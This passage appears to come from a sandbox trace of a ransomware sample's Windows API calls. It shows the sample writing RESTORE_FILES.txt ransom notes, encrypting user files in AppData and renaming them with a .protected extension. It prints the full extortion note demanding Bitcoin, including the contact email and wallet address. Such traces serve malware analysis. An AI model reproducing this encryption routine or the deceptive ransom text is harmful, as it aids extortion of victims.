hFindFile=0x47ba50) returned 1 [0091.037] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\RESTORE_FILES.txt") returned 83 [0091.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0091.044] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.044] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0091.051] lstrlenA (lpString="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") returned 684 [0091.051] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0091.051] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.051] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0091.051] CloseHandle (hObject=0xd8) returned 1 [0091.051] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0091.051] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0091.051] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\RESTORE_FILES.txt") returned 75 [0091.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.052] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.052] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0091.052] lstrlenA (lpString="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") returned 684 [0091.052] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0091.052] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.053] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0091.053] CloseHandle (hObject=0xd4) returned 1 [0091.053] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.053] lstrcmpiW (lpString1="M_rWoVKTtbG.avi", lpString2="Windows") returned -1 [0091.053] lstrcmpiW (lpString1="M_rWoVKTtbG.avi", lpString2="Program Files") returned -1 [0091.053] lstrcmpiW (lpString1="M_rWoVKTtbG.avi", lpString2="Program Files (x86)") returned -1 [0091.053] lstrcmpiW (lpString1="M_rWoVKTtbG.avi", lpString2="$Recycle.bin") returned 1 [0091.053] lstrcmpiW (lpString1="M_rWoVKTtbG.avi", lpString2="System Volume Information") returned -1 [0091.053] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi") returned 65 [0091.053] StrStrIW (lpFirst="M_rWoVKTtbG.avi", lpSrch=".protected") returned 0x0 [0091.053] lstrcmpW (lpString1="M_rWoVKTtbG.avi", lpString2="RESTORE_FILES.txt") returned -1 [0091.053] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.053] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\m_rwovkttbg.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi") returned 65 [0091.053] StrStrW (lpFirst="M_rWoVKTtbG.avi", lpSrch=".txt") returned 0x0 [0091.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi") returned 65 
[0091.053] StrStrW (lpFirst="M_rWoVKTtbG.avi", lpSrch=".rar") returned 0x0 [0091.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi") returned 65 [0091.053] StrStrW (lpFirst="M_rWoVKTtbG.avi", lpSrch=".zip") returned 0x0 [0091.053] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.054] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.054] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.055] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.055] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.055] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.055] CloseHandle (hObject=0xd4) returned 1 [0091.056] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi.protected") returned 75 [0091.056] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\m_rwovkttbg.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\m_rwovkttbg.avi.protected")) returned 1 [0091.056] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.056] lstrcmpiW (lpString1="ndi3ygm.mkv", lpString2="Windows") returned -1 [0091.056] lstrcmpiW (lpString1="ndi3ygm.mkv", lpString2="Program Files") returned -1 [0091.056] lstrcmpiW (lpString1="ndi3ygm.mkv", lpString2="Program Files (x86)") returned -1 [0091.056] lstrcmpiW (lpString1="ndi3ygm.mkv", lpString2="$Recycle.bin") returned 1 [0091.056] lstrcmpiW (lpString1="ndi3ygm.mkv", lpString2="System Volume Information") returned -1 [0091.056] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv") returned 61 [0091.056] StrStrIW (lpFirst="ndi3ygm.mkv", lpSrch=".protected") returned 0x0 [0091.056] lstrcmpW (lpString1="ndi3ygm.mkv", lpString2="RESTORE_FILES.txt") returned -1 [0091.057] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.057] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ndi3ygm.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv") returned 61 [0091.057] StrStrW (lpFirst="ndi3ygm.mkv", lpSrch=".txt") returned 0x0 [0091.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv") returned 61 [0091.057] StrStrW (lpFirst="ndi3ygm.mkv", lpSrch=".rar") returned 0x0 [0091.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv") returned 61 [0091.057] StrStrW (lpFirst="ndi3ygm.mkv", lpSrch=".zip") returned 0x0 [0091.057] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.058] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.058] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.058] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.058] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.058] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.058] CloseHandle (hObject=0xd4) returned 1 [0091.059] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv.protected") returned 71 [0091.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ndi3ygm.mkv"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ndi3ygm.mkv.protected")) returned 1 [0091.060] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.060] lstrcmpiW (lpString1="NOHa77v.gif", lpString2="Windows") returned -1 [0091.060] lstrcmpiW (lpString1="NOHa77v.gif", lpString2="Program Files") returned -1 [0091.060] lstrcmpiW (lpString1="NOHa77v.gif", lpString2="Program Files (x86)") returned -1 [0091.060] lstrcmpiW (lpString1="NOHa77v.gif", lpString2="$Recycle.bin") returned 1 [0091.060] lstrcmpiW (lpString1="NOHa77v.gif", lpString2="System Volume Information") returned -1 [0091.060] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif") returned 61 [0091.060] StrStrIW (lpFirst="NOHa77v.gif", lpSrch=".protected") returned 0x0 [0091.060] lstrcmpW (lpString1="NOHa77v.gif", lpString2="RESTORE_FILES.txt") returned -1 [0091.060] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.060] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\noha77v.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif") returned 61 [0091.060] StrStrW (lpFirst="NOHa77v.gif", lpSrch=".txt") returned 0x0 [0091.060] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif") returned 61 [0091.060] StrStrW (lpFirst="NOHa77v.gif", lpSrch=".rar") returned 0x0 [0091.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif") returned 61 [0091.060] StrStrW (lpFirst="NOHa77v.gif", lpSrch=".zip") returned 0x0 [0091.060] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.061] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.061] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.062] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.062] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.062] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.062] CloseHandle (hObject=0xd4) returned 1 [0091.062] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif.protected") returned 71 [0091.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\noha77v.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\noha77v.gif.protected")) returned 1 [0091.063] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.063] lstrcmpiW (lpString1="oJ7Xs.ods", lpString2="Windows") returned -1 [0091.063] lstrcmpiW (lpString1="oJ7Xs.ods", lpString2="Program Files") returned -1 [0091.063] lstrcmpiW (lpString1="oJ7Xs.ods", lpString2="Program Files (x86)") returned -1 [0091.063] lstrcmpiW (lpString1="oJ7Xs.ods", lpString2="$Recycle.bin") returned 1 [0091.063] lstrcmpiW (lpString1="oJ7Xs.ods", lpString2="System Volume Information") returned -1 [0091.063] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods") returned 59 [0091.063] StrStrIW (lpFirst="oJ7Xs.ods", lpSrch=".protected") returned 0x0 [0091.063] lstrcmpW (lpString1="oJ7Xs.ods", lpString2="RESTORE_FILES.txt") returned -1 [0091.063] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.063] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oj7xs.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.064] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods") returned 59 [0091.064] StrStrW (lpFirst="oJ7Xs.ods", lpSrch=".txt") returned 0x0 [0091.064] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods") returned 59 [0091.064] StrStrW (lpFirst="oJ7Xs.ods", lpSrch=".rar") returned 0x0 [0091.064] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods") returned 59 [0091.064] StrStrW (lpFirst="oJ7Xs.ods", lpSrch=".zip") returned 0x0 [0091.064] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.064] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.064] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.065] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.065] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.065] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.065] CloseHandle (hObject=0xd4) returned 1 [0091.066] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods.protected") returned 69 [0091.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\oj7xs.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oj7xs.ods.protected")) returned 1 [0091.067] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.067] lstrcmpiW (lpString1="taoP-XRrVNbmdlJ.png", lpString2="Windows") returned -1 [0091.067] lstrcmpiW (lpString1="taoP-XRrVNbmdlJ.png", lpString2="Program Files") returned 1 [0091.067] lstrcmpiW (lpString1="taoP-XRrVNbmdlJ.png", lpString2="Program Files (x86)") returned 1 [0091.067] lstrcmpiW (lpString1="taoP-XRrVNbmdlJ.png", lpString2="$Recycle.bin") returned 1 [0091.067] lstrcmpiW (lpString1="taoP-XRrVNbmdlJ.png", lpString2="System Volume Information") returned 1 [0091.067] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png") returned 69 [0091.067] StrStrIW (lpFirst="taoP-XRrVNbmdlJ.png", lpSrch=".protected") returned 0x0 [0091.067] lstrcmpW (lpString1="taoP-XRrVNbmdlJ.png", lpString2="RESTORE_FILES.txt") returned 1 [0091.067] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.067] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\taop-xrrvnbmdlj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png") returned 69 
